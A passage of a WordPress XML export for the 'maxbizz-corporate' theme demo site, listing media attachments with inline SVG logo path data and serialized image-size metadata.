		<path class="st0" d="M94.4,10.1c-0.5,0-0.9-0.1-1.2-0.4c-0.3-0.3-0.4-0.6-0.4-1c0-0.4,0.1-0.8,0.4-1s0.7-0.4,1.2-0.4    c0.5,0,0.9,0.1,1.2,0.4s0.4,0.6,0.4,1c0,0.4-0.1,0.8-0.4,1S94.9,10.1,94.4,10.1z M95.8,20.5H93v-9h2.8V20.5z"></path>
		<path class="st0" d="M104.9,20.2c-0.6,0.4-1.5,0.5-2.7,0.5c-1.4,0-2.5-0.4-3.4-1.3s-1.3-1.9-1.3-3.2c0-1.5,0.5-2.7,1.4-3.6    s2.1-1.3,3.7-1.3c1.1,0,1.8,0.1,2.3,0.4v2.4c-0.6-0.4-1.2-0.7-1.9-0.7c-0.8,0-1.4,0.2-1.9,0.7c-0.5,0.5-0.7,1.1-0.7,1.9    c0,0.8,0.2,1.4,0.7,1.9s1.1,0.7,1.8,0.7c0.7,0,1.4-0.2,2-0.7V20.2z"></path>
		<path class="st0" d="M111.4,20.1v-2.8c0.5,0.4,1.1,0.7,1.7,1c0.6,0.2,1.2,0.3,1.8,0.3c0.4,0,0.7,0,0.9-0.1    c0.3-0.1,0.5-0.2,0.7-0.3c0.2-0.1,0.3-0.2,0.4-0.4s0.1-0.3,0.1-0.5c0-0.2-0.1-0.5-0.2-0.7s-0.3-0.4-0.6-0.5s-0.5-0.3-0.9-0.5    s-0.7-0.3-1.1-0.5c-1-0.4-1.7-0.9-2.2-1.5c-0.5-0.6-0.7-1.3-0.7-2.1c0-0.7,0.1-1.2,0.4-1.7s0.6-0.9,1.1-1.2c0.5-0.3,1-0.5,1.6-0.7    c0.6-0.1,1.2-0.2,1.9-0.2c0.7,0,1.2,0,1.7,0.1c0.5,0.1,1,0.2,1.4,0.4v2.6c-0.2-0.1-0.4-0.3-0.7-0.4s-0.5-0.2-0.8-0.3    c-0.3-0.1-0.5-0.1-0.8-0.2c-0.3,0-0.5-0.1-0.7-0.1c-0.3,0-0.6,0-0.9,0.1c-0.3,0.1-0.5,0.1-0.7,0.3s-0.3,0.2-0.4,0.4    s-0.1,0.3-0.1,0.5c0,0.2,0.1,0.4,0.2,0.6c0.1,0.2,0.3,0.3,0.5,0.5c0.2,0.1,0.5,0.3,0.7,0.4s0.6,0.3,1,0.4c0.5,0.2,1,0.4,1.4,0.7    c0.4,0.2,0.7,0.5,1,0.8s0.5,0.6,0.7,1c0.2,0.4,0.2,0.8,0.2,1.3c0,0.7-0.1,1.3-0.4,1.8c-0.3,0.5-0.6,0.9-1.1,1.2    c-0.5,0.3-1,0.5-1.6,0.6c-0.6,0.1-1.2,0.2-1.9,0.2c-0.7,0-1.3-0.1-2-0.2C112.4,20.5,111.9,20.3,111.4,20.1z"></path>
		<path class="st0" d="M129.6,20.5h-7.6V7.9h7.3v2.3h-4.4v2.8h4.1v2.3h-4.1v2.9h4.7V20.5z"></path>
		<path class="st0" d="M137,20.8c-1.8,0-3.3-0.6-4.4-1.8c-1.1-1.2-1.7-2.7-1.7-4.6c0-2,0.6-3.6,1.7-4.8s2.7-1.8,4.6-1.8    c1.8,0,3.3,0.6,4.4,1.8c1.1,1.2,1.7,2.7,1.7,4.7c0,2-0.6,3.6-1.7,4.8C140.3,20.2,138.8,20.8,137,20.8z M137.1,10.2    c-1,0-1.8,0.4-2.4,1.1c-0.6,0.7-0.9,1.7-0.9,3c0,1.2,0.3,2.2,0.9,3s1.4,1.1,2.3,1.1c1,0,1.8-0.4,2.3-1.1s0.9-1.7,0.9-2.9    c0-1.3-0.3-2.3-0.8-3S138.1,10.2,137.1,10.2z"></path>
	</g>
	<path class="st0" d="M30.3,16.2c-1.3,0-2.4,1.1-2.4,2.4c0,0.3,0.1,0.7,0.2,1l-5.4,5.4c-0.2-0.1-0.4-0.3-0.6-0.4V9.8   c2.6-0.1,4.6-2.3,4.6-4.9c0-2.7-2.2-4.9-4.9-4.9s-4.9,2.2-4.9,4.9c0,0.7,0.1,1.3,0.4,1.9l-6.8,5.3c-1.1-1.1-2.6-1.7-4.3-1.7   c-3.4,0-6.2,2.8-6.2,6.2c0,3.4,2.8,6.2,6.2,6.2c3.4,0,6.2-2.8,6.2-6.2c0-1.1-0.3-2.1-0.8-3l6.7-5.2c0.5,0.6,1.2,1,2,1.2v14.7   c-1.9,0.1-3.3,1.7-3.3,3.5c0,2,1.6,3.6,3.6,3.6c2,0,3.6-1.6,3.6-3.6c0-0.5-0.1-0.9-0.3-1.3l5.6-5.6c0.3,0.1,0.6,0.2,1,0.2   c1.3,0,2.4-1.1,2.4-2.4C32.7,17.2,31.6,16.2,30.3,16.2z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/06-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>588</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/06-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 128 29.8" style="enable-background:new 0 0 128 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x36_">
	<path class="st0" d="M12.4,9.9C10.7,8,8.2,7.2,5.8,7.5C5.6,7.9,5.4,8.3,5.2,8.7c1.3,0.3,2.6,0.9,3.6,2c2.5,2.7,2.3,6.9-0.4,9.4   c-0.9,0.9-2.1,1.4-3.2,1.6c0.1,0.2,0.2,0.4,0.3,0.5c2.3,0.5,4.7-0.1,6.5-1.8C15,17.6,15.2,12.9,12.4,9.9z M7.6,17.8   c1.4-1.9,1-4.7-1-6.1c-1.9-1.4-4.7-1-6.1,1C0.3,13,0.1,13.3,0,13.7c0.8-0.8,2-0.9,2.9-0.2c1,0.7,1.2,2.2,0.5,3.2   c-0.7,1-2.2,1.2-3.2,0.5c0,0-0.1,0-0.1-0.1c0.3,0.6,0.8,1.2,1.4,1.6C3.5,20.2,6.2,19.7,7.6,17.8z M20.7,7c-3.1-3.4-7.8-4.5-12-3.3   C8.6,3.8,8.6,3.9,8.5,3.9C7.9,4.5,7.3,5.1,6.9,5.7c2.7-0.2,5.5,0.7,7.5,2.9c3.4,3.7,3.1,9.4-0.6,12.8c-2,1.9-4.7,2.6-7.2,2.3   c0.3,0.4,0.6,0.8,1,1.2c0.3,0.4,0.7,0.7,1,1c3.8,1.2,8.2,0.4,11.4-2.5C24.7,19.1,25.1,11.8,20.7,7z M11.6,1.7   c4.1-0.5,8.5,0.9,11.5,4.2c5,5.4,4.6,13.8-0.8,18.8c-3,2.7-6.8,3.8-10.6,3.4c5.4,2.8,12.2,2.1,16.9-2.2c6.1-5.6,6.5-15,0.9-21.1   C24.9-0.3,17.5-1.4,11.6,1.7z"></path>
	<g>
		<path class="st0" d="M46.9,7.2h5.6c1.2,0,2.1,0.3,2.9,0.9c0.7,0.6,1.1,1.4,1.1,2.4c0,0.6-0.2,1.2-0.5,1.7    c-0.4,0.5-0.9,0.9-1.5,1.1c0.7,0.2,1.3,0.6,1.8,1.1c0.4,0.5,0.7,1.1,0.7,1.9c0,1-0.4,1.9-1.2,2.5c-0.8,0.6-1.8,1-3,1h-5.9V7.2z     M52.3,9h-3.2v3.5h3.2c0.6,0,1.1-0.2,1.5-0.5c0.4-0.3,0.6-0.7,0.6-1.3s-0.2-1-0.6-1.3C53.4,9.1,52.9,9,52.3,9z M52.5,18    c0.7,0,1.2-0.2,1.6-0.5c0.4-0.4,0.6-0.8,0.6-1.4s-0.2-1.1-0.6-1.4c-0.4-0.3-0.9-0.5-1.6-0.5h-3.4V18H52.5z"></path>
		<path class="st0" d="M58.8,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1C64.6,19.9,64,20,63.3,20s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C58.9,16.6,58.8,16,58.8,15.3z M63.3,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C62,18,62.6,18.2,63.3,18.2z"></path>
		<path class="st0" d="M69.6,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C69.7,16.6,69.6,16,69.6,15.3z M74.2,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C72.8,18,73.4,18.2,74.2,18.2z"></path>
		<path class="st0" d="M80,18.8l1-1.4c0.6,0.4,1.1,0.6,1.5,0.8c0.4,0.2,0.9,0.2,1.3,0.2c0.5,0,1-0.1,1.3-0.3s0.5-0.5,0.5-0.9    c0-0.3-0.1-0.5-0.3-0.7s-0.5-0.3-0.9-0.4l-1.6-0.3c-0.9-0.2-1.5-0.4-2-0.9c-0.4-0.4-0.7-1-0.7-1.6c0-0.8,0.3-1.5,1-2    c0.6-0.5,1.5-0.8,2.5-0.8c0.6,0,1.2,0.1,1.8,0.3c0.6,0.2,1.2,0.4,1.7,0.8l-1,1.3c-0.5-0.3-0.9-0.5-1.4-0.7    c-0.4-0.1-0.9-0.2-1.3-0.2c-0.5,0-0.8,0.1-1.1,0.3c-0.3,0.2-0.4,0.4-0.4,0.8c0,0.3,0.1,0.5,0.3,0.6c0.2,0.1,0.5,0.3,1,0.3l1.6,0.3    c0.9,0.2,1.6,0.5,2,0.9c0.4,0.4,0.7,1,0.7,1.6c0,0.4-0.1,0.8-0.3,1.2c-0.2,0.4-0.4,0.7-0.8,0.9s-0.7,0.5-1.2,0.6    c-0.5,0.1-0.9,0.2-1.4,0.2c-0.8,0-1.5-0.1-2.2-0.3S80.5,19.2,80,18.8z"></path>
		<path class="st0" d="M90.4,17.4v-5h-1.8v-1.6h1.8V8.3l2-0.4v2.9h2.5v1.6h-2.5V17c0,0.4,0.1,0.8,0.3,0.9c0.2,0.2,0.5,0.3,1,0.3    c0.2,0,0.4,0,0.6,0c0.2,0,0.4-0.1,0.7-0.2v1.7c-0.3,0.1-0.6,0.1-0.9,0.2c-0.3,0-0.6,0.1-0.9,0.1c-0.9,0-1.6-0.2-2.1-0.6    S90.4,18.3,90.4,17.4z"></path>
		<path class="st0" d="M104.3,18.7c-0.6,0.5-1.1,0.8-1.7,1c-0.6,0.2-1.2,0.3-1.9,0.3c-0.6,0-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.5-1    s-0.7-0.9-1-1.5s-0.4-1.2-0.4-1.8c0-0.7,0.1-1.3,0.3-1.8c0.2-0.6,0.5-1.1,0.9-1.5s0.9-0.7,1.4-1s1.1-0.4,1.7-0.4    c0.6,0,1.2,0.1,1.7,0.4c0.5,0.2,1,0.6,1.3,1s0.7,0.9,0.9,1.5c0.2,0.6,0.3,1.2,0.3,1.9v0.5h-6.7c0.1,0.7,0.4,1.3,0.9,1.8    s1.1,0.7,1.8,0.7c0.4,0,0.8-0.1,1.2-0.2c0.4-0.1,0.7-0.4,0.9-0.6L104.3,18.7z M100.5,12.3c-0.6,0-1.1,0.2-1.5,0.6    c-0.4,0.4-0.7,1-0.8,1.6h4.7c-0.1-0.7-0.4-1.2-0.8-1.6S101.1,12.3,100.5,12.3z"></path>
		<path class="st0" d="M106.9,19.8v-9h2v2c0.2-0.7,0.6-1.2,1-1.6s0.9-0.5,1.5-0.5c0.2,0,0.3,0,0.4,0.1c0.1,0,0.3,0.1,0.4,0.1v1.8    c-0.2-0.1-0.3-0.1-0.5-0.2s-0.4-0.1-0.6-0.1c-0.5,0-0.9,0.1-1.3,0.4c-0.4,0.3-0.7,0.6-0.9,1.1v5.9H106.9z"></path>
		<path class="st0" d="M115,9c-0.3,0-0.6-0.1-0.9-0.4s-0.4-0.5-0.4-0.9c0-0.3,0.1-0.6,0.4-0.9c0.3-0.3,0.5-0.4,0.9-0.4    c0.3,0,0.6,0.1,0.9,0.4c0.3,0.3,0.4,0.5,0.4,0.9c0,0.3-0.1,0.6-0.4,0.9S115.3,9,115,9z M116,10.8v9h-2v-9H116z"></path>
		<path class="st0" d="M118.1,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C118.2,16.6,118.1,16,118.1,15.3z M122.6,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1    C121.3,18,121.9,18.2,122.6,18.2z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-404</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/404-2/bg-404/</link>
		<pubDate>Wed, 09 Sep 2020 03:35:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-404.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>599</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:35:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:35:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-404]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>597</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-404.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-404.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:950;s:4:"file";s:20:"2020/09/bg-404.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg-404-1-300x148.jpg";s:5:"width";i:300;s:6:"height";i:148;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"bg-404-1-1024x507.jpg";s:5:"width";i:1024;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"bg-404-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"bg-404-1-768x380.jpg";s:5:"width";i:768;s:6:"height";i:380;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:21:"bg-404-1-1536x760.jpg";s:5:"width";i:1536;s:6:"height";i:760;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-404-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-404-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"bg-404-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:21:"bg-404-1-1200x950.jpg";s:5:"width";i:1200;s:6:"height";i:950;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>coming-soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/coming-soon/coming-soon-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:47:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>607</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:47:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:47:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>604</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/coming-soon.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:1080;s:4:"file";s:25:"2020/09/coming-soon.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"coming-soon-1-300x169.jpg";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"coming-soon-1-1024x576.jpg";s:5:"width";i:1024;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"coming-soon-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"coming-soon-1-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"coming-soon-1-1536x864.jpg";s:5:"width";i:1536;s:6:"height";i:864;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"coming-soon-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"coming-soon-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"coming-soon-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"coming-soon-1-1200x1080.jpg";s:5:"width";i:1200;s:6:"height";i:1080;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/pheader-elements/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>625</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-elements]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-elements.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:30:"2020/09/pheader-elements.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:29:"pheader-elements-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"pheader-elements-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"pheader-elements-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"pheader-elements-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"pheader-elements-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-elements-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"pheader-elements-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"pheader-elements-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"pheader-elements-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>interface</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/interface/</link>
		<pubDate>Wed, 09 Sep 2020 07:02:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/interface.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>629</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:02:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:02:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[interface]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/interface.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/interface.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>business-and-finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/elements__trashed/business-and-finance/</link>
